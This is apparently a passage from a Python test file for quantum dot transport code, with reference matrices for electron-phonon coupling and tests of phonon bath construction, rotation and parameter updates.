'ssq': [[[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 2, 1j, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 1j, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 2, 1j, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 1j, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 4, 1j, 1j, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 1j, 3, 0, 1j, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 1j, 0, 3, 1j, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 1j, 1j, 2, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 5, 1j, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1j, 4, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 5, 1j, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1j, 4, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 6]], [[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 4, 2j, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 2j, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 4, 2j, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 2j, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 7, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 8, 2j, 2j, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 2j, 7, 0, 2j, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 2j, 0, 7, 2j, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 2j, 2j, 6, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 7, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 11, 2j, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2j, 10, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 11, 2j, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2j, 10, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 14]]]}
p = ParametersDoubleDotSpinfulElPh()
for indexing in ['Lin', 'charge', 'sz', 'ssq']:
si = StateIndexing(4, indexing=indexing)
baths = PhononBaths(p.nbaths, {}, si, {}, {}, {})
Vbbp = elph_construct_Vbbp(baths, p.velph)
assert norm(Vbbp - data[indexing]) < EPS
def test_rotate_Vbbp():
data = {'Lin': [[[0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 1.5-1.0j, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.5, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 1.5-1.0j, 0.0, -0.5, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 3.0-1.7888543819998315j, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.5257311121191336, 0.0, 0.8944271909999155j, 0.0, 0.0, 0.0], [0.0, 0.0, -0.5, 0.0, 1.5+1.0j, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 3.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.5-1.0j, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.5, 0.0], [0.0, -0.5, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.5+1.0j, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, -0.5257311121191336, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.0, 0.0, 0.8506508083520395, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.5-1.0j, 0.0, -0.5, 0.0, 0.0], [0.0, 0.0, 0.0, 0.8944271909999156j, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.8506508083520395, 0.0, 3.0+1.7888543819998302j, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.5, 0.0, 4.5+1.0j, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.5, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.5+1.0j, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 6.0]], [[0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 3.5-2.0j, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.5, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 3.5-2.0j, 0.0, -0.5, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 7.0-3.577708763999663j, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.5257311121191335, 0.0, 1.788854381999831j, 0.0, 0.0, 0.0], [0.0, 0.0, -0.5, 0.0, 3.5+2.0j, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 7.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 7.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 10.5-2.0j, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.5, 0.0], [0.0, -0.5, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.5+2.0j, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 7.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, -0.5257311121191336, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 7.0, 0.0, 0.8506508083520394, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 10.5-2.0j, 0.0, -0.5, 0.0, 0.0], [0.0, 0.0, 0.0, 1.7888543819998313j, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.8506508083520391, 0.0, 7.0+3.5777087639996603j, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.5, 0.0, 10.5+2.0j, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.5, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 10.5+2.0j, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 14.0]]],
'charge': [[[0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 1.5-1.0j, 0.0, 0.0, -0.5, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 1.5-1.0j, -0.5, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 0.0, -0.5, 1.5+1.0j, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, -0.5, 0.0, 0.0, 1.5+1.0j, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 3.0-1.7888543819998315j, 0.0, 0.0, 0.0, -0.5257311121191336, 0.8944271909999155j, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, -0.5257311121191336, 0.0, 0.0, 0.0, 3.0, 0.8506508083520395, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.8944271909999156j, 0.0, 0.0, 0.0, 0.8506508083520395, 3.0+1.7888543819998302j, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.5-1.0j, 0.0, 0.0, -0.5, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.5-1.0j, -0.5, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.5, 4.5+1.0j, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.5, 0.0, 0.0, 4.5+1.0j, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 6.0]], [[0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 3.5-2.0j, 0.0, 0.0, -0.5, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 3.5-2.0j, -0.5, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 0.0, -0.5, 3.5+2.0j, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, -0.5, 0.0, 0.0, 3.5+2.0j, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 7.0-3.577708763999663j, 0.0, 0.0, 0.0, -0.5257311121191335, 1.788854381999831j, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 7.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 7.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 7.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, -0.5257311121191336, 0.0, 0.0, 0.0, 7.0, 0.8506508083520394, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 1.7888543819998313j, 0.0, 0.0, 0.0, 0.8506508083520391, 7.0+3.5777087639996603j, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 10.5-2.0j, 0.0, 0.0, -0.5, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 10.5-2.0j, -0.5, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.5, 10.5+2.0j, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.5, 0.0, 0.0, 10.5+2.0j, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 14.0]]],
'sz': [[[0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 1.5-1.0j, -0.5, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, -0.5, 1.5+1.0j, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 1.5-1.0j, -0.5, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, -0.5, 1.5+1.0j, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 3.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.0-1.7888543819998315j, 0.0, -0.5257311121191336, 0.8944271909999155j, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.5257311121191336, 0.0, 3.0, 0.8506508083520395, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.8944271909999156j, 0.0, 0.8506508083520395, 3.0+1.7888543819998302j, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.5-1.0j, -0.5, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.5, 4.5+1.0j, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.5-1.0j, -0.5, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.5, 4.5+1.0j, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 6.0]], [[0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 3.5-2.0j, -0.5, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, -0.5, 3.5+2.0j, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 3.5-2.0j, -0.5, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, -0.5, 3.5+2.0j, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 7.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 7.0-3.577708763999663j, 0.0, -0.5257311121191335, 1.788854381999831j, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 7.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.5257311121191336, 0.0, 7.0, 0.8506508083520394, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.7888543819998313j, 0.0, 0.8506508083520391, 7.0+3.5777087639996603j, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 7.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 10.5-2.0j, -0.5, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.5, 10.5+2.0j, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 10.5-2.0j, -0.5, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.5, 10.5+2.0j, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 14.0]]],
'ssq': [[[0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 1.5-1.0j, -0.5, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, -0.5, 1.5+1.0j, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 1.5-1.0j, -0.5, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, -0.5, 1.5+1.0j, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 3.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.0-1.7888543819998315j, -0.5257311121191329, 0.8944271909999164j, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.5257311121191329, 3.0, 0.8506508083520398, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.8944271909999163j, 0.8506508083520398, 3.0+1.7888543819998317j, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.5-1.0j, -0.5, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.5, 4.5+1.0j, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.5-1.0j, -0.5, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.5, 4.5+1.0j, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 6+0j]], [[0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 3.5-2.0j, -0.5, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, -0.5, 3.5+2.0j, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 3.5-2.0j, -0.5, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, -0.5, 3.5+2.0j, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 7.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 7.0-3.577708763999662j, -0.5257311121191319, 1.7888543819998328j, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.525731112119132, 7.0, 0.850650808352039, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.7888543819998326j, 0.8506508083520389, 7.0+3.5777087639996634j, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 7.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 7.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 10.5-2.0j, -0.5, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.5, 10.5+2.0j, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 10.5-2.0j, -0.5, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.5, 10.5+2.0j, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 14.0]]]}
p = ParametersDoubleDotSpinfulElPh()
for indexing in ['Lin', 'charge', 'sz', 'ssq']:
si = StateIndexing(4, indexing=indexing)
leads = PhononBaths(p.nbaths, {}, si, {}, {}, {})
Tba0 = elph_construct_Vbbp(leads, p.velph)
Tba = elph_rotate_Vbbp(Tba0, p.vecs[indexing], si)
assert norm(Tba - data[indexing]) < EPS
def test_make_velph_dict():
nsingle = 4
nbaths = 2
si = StateIndexing(nsingle)
si.nbaths = nbaths
#
b1_cL, b1_cR, b1_oL, b1_oR = 7.0, 5.0, 2.0j, 1.0j
b2_cL, b2_cR, b2_oL, b2_oR = 70.0, 50.0, 20.0j, 10.0j
velph_dict = {(0,0,0): b1_cL, (0,2,2): b1_cL, (0,1,1): b1_cR, (0,3,3): b1_cR, (0,0,1): b1_oL, (0,1,0): b1_oR, (0,2,3): b1_oL, (0,3,2): b1_oR,
(1,0,0): b2_cL, (1,2,2): b2_cL, (1,1,1): b2_cR, (1,3,3): b2_cR, (1,0,1): b2_oL, (1,1,0): b2_oR, (1,2,3): b2_oL, (1,3,2): b2_oR}
velph_list = [[0,0,0,b1_cL], [0,2,2,b1_cL], [0,1,1,b1_cR], [0,3,3,b1_cR], [0,0,1,b1_oL], [0,1,0,b1_oR], [0,2,3,b1_oL], [0,3,2,b1_oR],
[1,0,0,b2_cL], [1,2,2,b2_cL], [1,1,1,b2_cR], [1,3,3,b2_cR], [1,0,1,b2_oL], [1,1,0,b2_oR], [1,2,3,b2_oL], [1,3,2,b2_oR]]
velph_mtr = [[[b1_cL, b1_oL, 0.0, 0.0], [b1_oR, b1_cR, 0.0, 0.0], [0.0, 0.0, b1_cL, b1_oL], [0.0, 0.0, b1_oR, b1_cR]],
[[b2_cL, b2_oL, 0.0, 0.0], [b2_oR, b2_cR, 0.0, 0.0], [0.0, 0.0, b2_cL, b2_oL], [0.0, 0.0, b2_oR, b2_cR]]]
assert make_velph_dict(velph_list, si) == velph_dict
assert make_velph_dict(velph_dict, si) == velph_dict
assert make_velph_dict(np.array(velph_mtr), si) == velph_dict
def test_PhononBaths():
nsingle = 2
nbaths = 2
b1_elph_d, b1_elph_o = 1.0, 2.0
b2_elph_d, b2_elph_o = 3.0, 4.0
temp_ph, dband_ph_min, dband_ph_max = 1.0, 0.1, 60.0
dband_ph = [dband_ph_min, dband_ph_max]
tlst_ph = {0: temp_ph, 1: temp_ph}
dlst_ph = {0: dband_ph, 1: dband_ph}
velph = np.array([[[b1_elph_d,b1_elph_o], [b1_elph_o,b1_elph_d]],
[[b2_elph_d,b2_elph_o], [b2_elph_o,b2_elph_d]]])
si = StateIndexing(nsingle)
baths = PhononBaths(nbaths, velph, si, tlst_ph, dlst_ph)
#
velph_dict = {(0,0,0):b1_elph_d, (0,1,1):b1_elph_d, (0,0,1):b1_elph_o, (0,1,0):b1_elph_o,
(1,0,0):b2_elph_d, (1,1,1):b2_elph_d, (1,0,1):b2_elph_o, (1,1,0):b2_elph_o}
assert baths.velph == velph_dict
assert baths.si.nbaths == 2
assert baths.tlst_ph.tolist() == [temp_ph, temp_ph]
assert baths.dlst_ph.tolist() == [dband_ph, dband_ph]
#
baths.add(velph={(0,0,0):1.0, (0,1,1):2.0, (0,0,1):3.0, (0,1,0):4.0,
(1,0,0):5.0, (1,1,1):6.0, (1,0,1):7.0, (1,1,0):8.0},
tlst_ph={0:1.0, 1:2.0},
dlst_ph={0:[1.0,2.0], 1:[3.0,4.0]})
assert baths.velph == {(0,0,0):b1_elph_d+1.0, (0,1,1):b1_elph_d+2.0, (0,0,1):b1_elph_o+3.0, (0,1,0):b1_elph_o+4.0,
(1,0,0):b2_elph_d+5.0, (1,1,1):b2_elph_d+6.0, (1,0,1):b2_elph_o+7.0, (1,1,0):b2_elph_o+8.0}
assert baths.tlst_ph.tolist() == [temp_ph+1.0, temp_ph+2.0]
assert baths.dlst_ph.tolist() == [[dband_ph_min+1.0,dband_ph_max+2.0], [dband_ph_min+3.0,dband_ph_max+4.0]]
#
baths.change(velph=velph_dict,
tlst_ph=[temp_ph, temp_ph],
dlst_ph=[dband_ph, dband_ph])
assert baths.velph == velph_dict
assert baths.tlst_ph.tolist() == [temp_ph, temp_ph]
assert baths.dlst_ph.tolist() == [dband_ph, dband_ph]
#
baths.change(tlst_ph={1: 2.13}, dlst_ph={1: [3.21,3.22]})
assert baths.tlst_ph.tolist() == [temp_ph, 2.13]
